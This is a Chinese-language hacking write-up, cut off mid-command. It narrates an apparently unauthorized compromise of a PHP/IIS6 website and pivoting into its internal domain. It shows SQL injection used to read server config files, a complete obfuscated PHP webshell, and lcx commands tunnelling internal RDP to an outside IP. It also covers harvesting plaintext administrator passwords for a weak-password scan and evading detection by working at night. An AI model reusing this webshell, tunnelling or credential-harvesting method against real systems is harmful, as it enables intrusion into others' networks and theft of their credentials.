先对目标站进行信息收集扫了下目录,iis6,发现了后台,.docVIP

先对目标站进行信息收集：扫了下目录，iis6，发现了后台，并且存在目录遍历： 存在目录遍历我寻思着找点有用的东西，看看有没有前人留下的脚印啥的，直接踩上去多方便，但是翻了一半天无果。从前台找找有没有有用的东西，发现新闻更新的挺勤的，说明管理员还是经常上线，想着x点cookie,结果找遍了都没有发现可以x的地方。 结果惊喜发现存在sql注入： 做到了这里，心想这个站还不轻松拿下么？？感觉shell已经在向我招手啦，用sqlmap跑起来： 解出Md5，前边已经得出了后台地址，于是转至后台拿shell，然后添加产品传图片 几番测试，发现是白名单过滤，考虑用iis6的解析漏洞来搞，但是，传上去会被重命名： 用bursuite抓了一下包试试，截断一下也不管用，感觉拿shell陷入困境。 整理了下思路，这个网站有注入点，是Php+mysql+iis6这样的结构，有后台地址，存在目录遍历，后台拿shell是失败了，但是前台拿shell呢？但是前台写shell需要满足三个条件，一个是权限，一个是转义函数是否开启，一个是网站物理路径。于是测试了一下，发现是dba权限： 好了，现在我们权限有了。然后也发现了魔法转义函数并没有开启： 那么第三个问题来啊了，网站物理路径上哪里去找？这是个很头疼的问题，大多数时候都是通过报错来找，但是很可惜这个网站报错爆不出物理路径，想通过目录遍历来翻找，但是也还是找不到。这个时候我注意到了这个网页服务器是iis6，而不是apache，突然想起来iis的配置文件c:\windows\system32\inetsrv\MetaBase.xml 中很可能保存着网站的物理路径，于是用load_file()函数来读一下试试： OK，成功找出网站物理路径，下一步就是写shell，感觉用手工要方便的多，于是直接用手工吧： 可是....这个结果也是让我大吃一惊...居然没写进去！！难道是我手残语句不对？？那我用工具好了，祭出sqlmap,然而也没写进去: 我擦....神器都写不进去还玩个毛....感觉写shell没希望了。不行，不能放弃，我就不信写不进去，突然想起穿山甲也有个写shell的功能，只要有一丝希望就不能放弃！，于是乎掏出了灰尘扑扑的穿山甲： 哈哈哈，终于写进来了，真爽啊，然而.....当我访问的时候却出现： 我擦..这又是个什么情况..我是真的想骂人了哈，算了算了换个马得了，换个猥琐点的：?php@$_=s.s./*-/*-*/e./*-/*-*/r;@$_=/*-/*-*/a./*-/*-*/$_./*-/*-*/t;@$_/*-/*-*/($/*-/*-*/{_P./*-/*-*/OS./*-/*-*/T}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);? OK！Shell到手： 支持aspx，于是传个aspx的马上去看看： 不是system权限，得提权，结果执行tasklist /svc一看，360全套啊，不好整： 再收集收集点信息，结果竟让我让我发现了这个，嘿嘿，真是人品爆发了： 开着3389，可以考虑远程连接一下。 并且还存在域，可以试着玩玩内网： 这台机器的主机名叫webserver，在GAONENG这个域里，然后试着收集一下域用户管理，找找域控之类的信息： 我擦..这是个什么鬼..又试了很多东西，结果发现都是同样的症状，不管了，先连上3389再说吧，因为服务器在内网，直接连外网IP不行，所以只好通过lcx.exe转发出来，我的工具里面只有lcx不被杀了，为了避免被管理员发现，只能晚上偷偷的潜入：在外网IP上执行lcx.exe -listen 51 33891在内网服务器上执行?lcx.exe -slave?外网IP 51 127.0.0.1 3389然后在外网IP上远程连接127.0.0.1:33891就可以连上内网的3389了： Ok，然后直接用administrator的账户和密码就登陆上去了，因为本地的用户不多，全在IIS侦探里面就能看到明文，所以就没有做导hash这个操作，但是密码太少，也不是件好事，然后把收集到的密码，包括windows密码和root密码，做成一个字典，然后挂在hscan上面扫一下弱口令： 结果仅仅只是扫出了两个弱口令，还有个sa权限的弱口令，并且129的这台机器还开了3389的端口，感觉有戏，就上连接器试试：结果发现xp_cmdshell被禁止了： 但是没关系，执行sql语句EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC